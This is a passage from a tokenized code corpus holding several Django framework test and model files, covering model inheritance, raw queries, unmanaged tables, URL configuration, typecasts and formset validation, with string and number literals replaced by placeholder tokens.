( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in Restaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in ItalianRestaurant . _meta . 
fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> ) <EOL> self . assertEqual ( Restaurant . _meta . ordering , [ "<STR_LIT>" ] ) <EOL> self . assertQuerysetEqual ( Place . objects . filter ( supplier__name = "<STR_LIT:foo>" ) , [ ] ) <EOL> self . assertRaises ( FieldError , <EOL> Restaurant . objects . filter , supplier__name = "<STR_LIT:foo>" <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( name = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertIs ( type ( p ) , Place ) <EOL> self . assertEqual ( <EOL> p . restaurant , Restaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Place . objects . get ( name = "<STR_LIT>" ) . restaurant . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( name = "<STR_LIT>" ) . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertRaises ( ItalianRestaurant . DoesNotExist , <EOL> lambda : p . restaurant . italianrestaurant <EOL> ) <EOL> self . assertRaises ( Place . DoesNotExist , <EOL> ItalianRestaurant . objects . get , name = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( Place . MultipleObjectsReturned , <EOL> Restaurant . objects . get , id__lt = <NUM_LIT> <EOL> ) <EOL> s1 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s1 . customers = [ r , ir ] <EOL> s2 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s2 . 
customers = [ ir ] <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertRaises ( Restaurant . DoesNotExist , <EOL> lambda : p . restaurant <EOL> ) <EOL> self . assertEqual ( p . supplier , s1 ) <EOL> self . assertQuerysetEqual ( <EOL> ir . provider . order_by ( "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) , <EOL> ) <EOL> park1 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = s1 <EOL> ) <EOL> park2 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = ir <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( lot__name = "<STR_LIT>" ) . name , <EOL> "<STR_LIT>" <EOL> ) <EOL> rows = Restaurant . objects . filter ( <EOL> serves_hot_dogs = True , name__contains = "<STR_LIT:D>" <EOL> ) . update ( <EOL> name = "<STR_LIT>" , serves_hot_dogs = False <EOL> ) <EOL> self . assertEqual ( rows , <NUM_LIT:1> ) <EOL> r1 = Restaurant . objects . get ( pk = r . pk ) <EOL> self . assertFalse ( r1 . serves_hot_dogs ) <EOL> self . assertEqual ( r1 . name , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . values ( "<STR_LIT:name>" , "<STR_LIT>" ) , [ <EOL> { "<STR_LIT>" : <NUM_LIT:4> , "<STR_LIT:name>" : "<STR_LIT>" } <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:2> , <EOL> lambda : ItalianRestaurant . objects . all ( ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:1> , <EOL> lambda : ItalianRestaurant . 
objects . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> def test_mixin_init ( self ) : <EOL> m = MixinModel ( ) <EOL> self . assertEqual ( m . other_attr , <NUM_LIT:1> ) </s>
<s> from __future__ import absolute_import <EOL> from datetime import date <EOL> from django . db . models . sql . query import InvalidQuery <EOL> from django . test import TestCase <EOL> from . models import Author , Book , Coffee , Reviewer , FriendlyAuthor <EOL> class RawQueryTests ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def assertSuccessfulRawQuery ( self , model , query , expected_results , <EOL> expected_annotations = ( ) , params = [ ] , translations = None ) : <EOL> """<STR_LIT>""" <EOL> results = list ( model . objects . raw ( query , params = params , translations = translations ) ) <EOL> self . assertProcessed ( model , results , expected_results , expected_annotations ) <EOL> self . assertAnnotations ( results , expected_annotations ) <EOL> def assertProcessed ( self , model , results , orig , expected_annotations = ( ) ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( len ( results ) , len ( orig ) ) <EOL> for index , item in enumerate ( results ) : <EOL> orig_item = orig [ index ] <EOL> for annotation in expected_annotations : <EOL> setattr ( orig_item , * annotation ) <EOL> for field in model . _meta . fields : <EOL> self . assertEqual ( getattr ( item , field . attname ) , <EOL> getattr ( orig_item , field . attname ) ) <EOL> self . assertEqual ( type ( getattr ( item , field . attname ) ) , <EOL> type ( getattr ( orig_item , field . attname ) ) ) <EOL> def assertNoAnnotations ( self , results ) : <EOL> """<STR_LIT>""" <EOL> self . assertAnnotations ( results , ( ) ) <EOL> def assertAnnotations ( self , results , expected_annotations ) : <EOL> """<STR_LIT>""" <EOL> if expected_annotations : <EOL> for index , result in enumerate ( results ) : <EOL> annotation , value = expected_annotations [ index ] <EOL> self . assertTrue ( hasattr ( result , annotation ) ) <EOL> self . 
assertEqual ( getattr ( result , annotation ) , value ) <EOL> def testSimpleRawQuery ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors ) <EOL> def testRawQueryLazy ( self ) : <EOL> """<STR_LIT>""" <EOL> q = Author . objects . raw ( '<STR_LIT>' ) <EOL> self . assertTrue ( q . query . cursor is None ) <EOL> list ( q ) <EOL> self . assertTrue ( q . query . cursor is not None ) <EOL> def testFkeyRawQuery ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> books = Book . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Book , query , books ) <EOL> def testDBColumnHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> coffees = Coffee . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Coffee , query , coffees ) <EOL> def testOrderHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> selects = ( <EOL> ( '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' ) , <EOL> ) <EOL> for select in selects : <EOL> query = "<STR_LIT>" % select <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors ) <EOL> def testTranslations ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> translations = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors , translations = translations ) <EOL> def testParams ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> author = Author . objects . all ( ) [ <NUM_LIT:2> ] <EOL> params = [ author . first_name ] <EOL> results = list ( Author . objects . raw ( query , params = params ) ) <EOL> self . assertProcessed ( Author , results , [ author ] ) <EOL> self . assertNoAnnotations ( results ) <EOL> self . 
assertEqual ( len ( results ) , <NUM_LIT:1> ) <EOL> def testManyToMany ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> reviewers = Reviewer . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Reviewer , query , reviewers ) <EOL> def testExtraConversions ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> translations = { '<STR_LIT>' : '<STR_LIT>' } <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors , translations = translations ) <EOL> def testMissingFields ( self ) : <EOL> query = "<STR_LIT>" <EOL> for author in Author . objects . raw ( query ) : <EOL> self . assertNotEqual ( author . first_name , None ) <EOL> self . assertNotEqual ( author . last_name , None ) <EOL> def testMissingFieldsWithoutPK ( self ) : <EOL> query = "<STR_LIT>" <EOL> try : <EOL> list ( Author . objects . raw ( query ) ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except InvalidQuery : <EOL> pass <EOL> def testAnnotations ( self ) : <EOL> query = "<STR_LIT>" <EOL> expected_annotations = ( <EOL> ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:1> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> ) <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors , expected_annotations ) <EOL> def testWhiteSpaceQuery ( self ) : <EOL> query = "<STR_LIT>" <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors ) <EOL> def testMultipleIterations ( self ) : <EOL> query = "<STR_LIT>" <EOL> normal_authors = Author . objects . all ( ) <EOL> raw_authors = Author . objects . raw ( query ) <EOL> first_iterations = <NUM_LIT:0> <EOL> for index , raw_author in enumerate ( raw_authors ) : <EOL> self . 
assertEqual ( normal_authors [ index ] , raw_author ) <EOL> first_iterations += <NUM_LIT:1> <EOL> second_iterations = <NUM_LIT:0> <EOL> for index , raw_author in enumerate ( raw_authors ) : <EOL> self . assertEqual ( normal_authors [ index ] , raw_author ) <EOL> second_iterations += <NUM_LIT:1> <EOL> self . assertEqual ( first_iterations , second_iterations ) <EOL> def testGetItem ( self ) : <EOL> query = "<STR_LIT>" <EOL> third_author = Author . objects . raw ( query ) [ <NUM_LIT:2> ] <EOL> self . assertEqual ( third_author . first_name , '<STR_LIT>' ) <EOL> first_two = Author . objects . raw ( query ) [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> self . assertEqual ( len ( first_two ) , <NUM_LIT:2> ) <EOL> self . assertRaises ( TypeError , lambda : Author . objects . raw ( query ) [ '<STR_LIT:test>' ] ) <EOL> def test_inheritance ( self ) : <EOL> f = FriendlyAuthor . objects . create ( first_name = "<STR_LIT>" , last_name = "<STR_LIT>" , <EOL> dob = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> ) ) <EOL> query = "<STR_LIT>" <EOL> self . assertEqual ( <EOL> [ o . pk for o in FriendlyAuthor . objects . raw ( query ) ] , [ f . pk ] <EOL> ) <EOL> def test_query_count ( self ) : <EOL> self . assertNumQueries ( <NUM_LIT:1> , <EOL> list , Author . objects . raw ( "<STR_LIT>" ) <EOL> ) </s>
<s> from __future__ import absolute_import <EOL> from django . db import connection <EOL> from django . test import TestCase <EOL> from . models import A01 , A02 , B01 , B02 , C01 , C02 , Unmanaged2 , Managed1 <EOL> class SimpleTests ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> a = A01 . objects . create ( f_a = "<STR_LIT:foo>" , f_b = <NUM_LIT> ) <EOL> B01 . objects . create ( fk_a = a , f_a = "<STR_LIT>" , f_b = <NUM_LIT> ) <EOL> c = C01 . objects . create ( f_a = "<STR_LIT>" , f_b = <NUM_LIT:1> ) <EOL> c . mm_a = [ a ] <EOL> a2 = A02 . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( a2 , A02 ) ) <EOL> self . assertEqual ( a2 . f_a , "<STR_LIT:foo>" ) <EOL> b2 = B02 . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( b2 , B02 ) ) <EOL> self . assertEqual ( b2 . f_a , "<STR_LIT>" ) <EOL> self . assertTrue ( isinstance ( b2 . fk_a , A02 ) ) <EOL> self . assertEqual ( b2 . fk_a . f_a , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( list ( C02 . objects . filter ( f_a = None ) ) , [ ] ) <EOL> resp = list ( C02 . objects . filter ( mm_a = a . id ) ) <EOL> self . assertEqual ( len ( resp ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( isinstance ( resp [ <NUM_LIT:0> ] , C02 ) ) <EOL> self . assertEqual ( resp [ <NUM_LIT:0> ] . f_a , '<STR_LIT>' ) <EOL> class ManyToManyUnmanagedTests ( TestCase ) : <EOL> def test_many_to_many_between_unmanaged ( self ) : <EOL> """<STR_LIT>""" <EOL> table = Unmanaged2 . _meta . get_field ( '<STR_LIT>' ) . m2m_db_table ( ) <EOL> tables = connection . introspection . table_names ( ) <EOL> self . assertTrue ( table not in tables , "<STR_LIT>" % table ) <EOL> def test_many_to_many_between_unmanaged_and_managed ( self ) : <EOL> """<STR_LIT>""" <EOL> table = Managed1 . _meta . get_field ( '<STR_LIT>' ) . m2m_db_table ( ) <EOL> tables = connection . introspection . table_names ( ) <EOL> self . assertTrue ( table in tables , "<STR_LIT>" % table ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) <EOL> class Location ( models . Model ) : <EOL> class Meta : <EOL> abstract = True <EOL> class Place ( Location ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) </s>
<s> from __future__ import absolute_import <EOL> from django . conf . urls import patterns , include <EOL> from . import views , customadmin , admin <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , views . secure_view ) , <EOL> ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> ( r'<STR_LIT>' , include ( customadmin . site . urls ) ) , <EOL> ( r'<STR_LIT>' , include ( admin . site . urls ) , dict ( form_url = '<STR_LIT>' ) ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Author ( models . Model ) : <EOL> first_name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> last_name = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> class Article ( models . Model ) : <EOL> author = models . ForeignKey ( Author ) <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> class Entry ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT> ) <EOL> body = models . TextField ( ) <EOL> pub_date = models . DateField ( ) <EOL> enable_comments = models . BooleanField ( ) <EOL> def __str__ ( self ) : <EOL> return self . title <EOL> class Book ( models . Model ) : <EOL> dewey_decimal = models . DecimalField ( primary_key = True , decimal_places = <NUM_LIT:2> , max_digits = <NUM_LIT:5> ) </s>
<s> import datetime <EOL> from django . db . backends import util as typecasts <EOL> from django . utils import unittest <EOL> TEST_CASES = { <EOL> '<STR_LIT>' : ( <EOL> ( '<STR_LIT>' , None ) , <EOL> ( None , None ) , <EOL> ( '<STR_LIT>' , datetime . date ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> ) ) , <EOL> ( '<STR_LIT>' , datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> ( '<STR_LIT>' , None ) , <EOL> ( None , None ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:8> , <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:8> , <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:12> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:12> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:12> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:12> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . time ( <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> ( '<STR_LIT>' , None ) , <EOL> ( None , None ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:0> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . 
datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT:11> , <NUM_LIT:8> , <NUM_LIT:50> , <NUM_LIT:30> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ) , <EOL> } <EOL> class DBTypeCasts ( unittest . TestCase ) : <EOL> def test_typeCasts ( self ) : <EOL> for k , v in TEST_CASES . iteritems ( ) : <EOL> for inpt , expected in v : <EOL> got = getattr ( typecasts , k ) ( inpt ) <EOL> self . assertEqual ( got , expected , "<STR_LIT>" % ( k , inpt , expected , got ) ) </s>
<s> from django . forms import Form , CharField , IntegerField , ValidationError , DateField <EOL> from django . forms . formsets import formset_factory , BaseFormSet <EOL> from django . test import TestCase <EOL> class Choice ( Form ) : <EOL> choice = CharField ( ) <EOL> votes = IntegerField ( ) <EOL> ChoiceFormSet = formset_factory ( Choice ) <EOL> class FavoriteDrinkForm ( Form ) : <EOL> name = CharField ( ) <EOL> class BaseFavoriteDrinksFormSet ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> seen_drinks = [ ] <EOL> for drink in self . cleaned_data : <EOL> if drink [ '<STR_LIT:name>' ] in seen_drinks : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> seen_drinks . append ( drink [ '<STR_LIT:name>' ] ) <EOL> class EmptyFsetWontValidate ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> raise ValidationError ( "<STR_LIT>" ) <EOL> FavoriteDrinksFormSet = formset_factory ( FavoriteDrinkForm , <EOL> formset = BaseFavoriteDrinksFormSet , extra = <NUM_LIT:3> ) <EOL> class FormsFormsetTestCase ( TestCase ) : <EOL> def test_basic_formset ( self ) : <EOL> formset = ChoiceFormSet ( auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( str ( formset ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : u'<STR_LIT>' } ] ) <EOL> formset = ChoiceFormSet ( ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertFalse ( formset . 
has_changed ( ) ) <EOL> def test_formset_validation ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ u'<STR_LIT>' ] } ] ) <EOL> def test_formset_has_changed ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> blank_formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( blank_formset . has_changed ( ) ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> invalid_formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( invalid_formset . is_valid ( ) ) <EOL> self . assertTrue ( invalid_formset . has_changed ( ) ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> valid_formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( valid_formset . is_valid ( ) ) <EOL> self . assertTrue ( valid_formset . has_changed ( ) ) <EOL> def test_formset_initial_data ( self ) : <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . 
join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : u'<STR_LIT>' } , { } ] ) <EOL> def test_second_form_partially_filled ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { } , { '<STR_LIT>' : [ u'<STR_LIT>' ] } ] ) <EOL> def test_delete_prefilled_data ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ u'<STR_LIT>' ] , '<STR_LIT>' : [ u'<STR_LIT>' ] } , { } ] ) <EOL> def test_displaying_more_than_one_blank_form ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . 
forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { } , { } , { } ] ) <EOL> def test_single_form_completed ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . 
